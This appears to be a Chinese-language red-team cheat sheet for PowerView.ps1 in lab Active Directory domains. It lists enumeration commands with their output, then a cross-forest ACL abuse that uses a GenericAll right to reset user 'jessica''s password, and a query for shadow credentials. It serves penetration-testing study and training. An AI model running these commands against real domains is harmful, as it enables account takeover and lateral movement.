powerview.ps1
1. 常用命令
导入
Import-Module .\PowerView.ps1
获取当前域的SID
Get-DomainSID
枚举SQL Server
Get-SQLServerLink
获取当前外部安全主体用户在另一个域所属的组
跨林攻击-外部安全主体&ACLs > 1.1.2. 枚举Logistics 域内各个组的用户
Get-DomainForeignGroupMember -Domain logistics.ad
枚举外部ACL主体
跨林攻击-外部安全主体&ACLs > 1.3.1. 枚举外部ACL主体
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Users\Administrator\Downloads> $sid = Convert-NameToSid ava
PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -domain logistics.ad | ? {$_.SecurityIdentifier -eq $sid}
AceType : AccessAllowed
ObjectDN : CN=jessica,CN=Users,DC=logistics,DC=ad
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-186204973-2882451676-2899969076-6601
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2432454459-173448545-3375717855-6101
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $pass = ConvertTo-SecureString 'Test@1234' -AsPlainText -Force
PS C:\Tools> Set-DomainUserPassword -identity jessica -AccountPassword $pass -domain logistics.ad -verbose
VERBOSE: [Get-PrincipalContext] Binding to domain 'logistics.ad'
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'jessica'
VERBOSE: [Set-DomainUserPassword] Password for user 'jessica' successfully reset
枚举影子凭据
#查询 msDS-KeyCredentialLink 属性不为空的用户
PS C:\Users\jeffry\Desktop> Get-DomainUser -Filter '(msDS-KeyCredentialLink=*)'
logoncount : 5
msds-keycredentiallink : B:828:00020000200001A98B9A34A7566C0B8633DF6ADBF934CFE79BE8617097536146F1F062ED29659920000272FF
2D049DD5FE5E47932D12B0E3C0D9922133B1A18B06B2E855C441B606418B1B01035253413100080000030000000001
00000000000000000000010001B5937A146A2068FF789505A762FD841BC944CF85A740E47C9195B6DE31B44915352B
408A8B8515CB346D96F0C444C8BDB56E80AD01A21F34E4DEAC3E2B0562D72812634679D10F2A5B4C214C4DB8EF58D3
1933C9163D6A426A79BDA4CCBDDC5A1889C234A416F0F3FE7308F7939D0B0FFBDC8D89B080617A407819D4F2C0DEA4
69AC1B3F0F96428B0D84722739A033E180F6A24B21C39210E3F05999BE5AEC8DB9BAE0EAAF9D5006AC54637D6EDD47
834176E850875F88A4B0D944BDC3A63E30D948EBFEC02F4332424F65342018714E5BF971232F0AB6E302393202FF73
488D5B4D62B43E52DAD19C20850BF40028D477CFC3543121161EAF84926E9F40443D0100040101000500100006937A
2D4642F339A196FC2C750D2F4C890200070100080008B1DB0C23BC98DA01080009B1DB0C23BC98DA01:CN=Gabriel,
CN=Users,DC=lab,DC=local
badpasswordtime : 01/01/1601 01:00:00
distinguishedname : CN=Gabriel,CN=Users,DC=lab,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : Gabriel
lastlogontimestamp : 27/04/2024 18:18:37
userprincipalname : gabriel@lab.local
name : Gabriel
objectsid : S-1-5-21-2570265163-3918697770-3667495639-4602
samaccountname : gabriel
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : NEVER
countrycode : 0
whenchanged : 27/04/2024 16:18:37
instancetype : 4
usncreated : 688697
objectguid : 03cd82aa-3a8c-4ba0-bcf8-850ba94cfd73
lastlogoff : 01/01/1601 01:00:00
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=lab,DC=local
dscorepropagationdata : {14/02/2024 20:21:05, 14/02/2024 20:16:19, 14/02/2024 20:15:00, 01/01/1601 00:00:01}
givenname : Gabriel
lastlogon : 27/04/2024 18:18:37
badpwdcount : 0
cn : Gabriel
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 14/02/2024 20:15:00
primarygroupid : 513
pwdlastset : 14/02/2024 21:15:00
usnchanged : 708837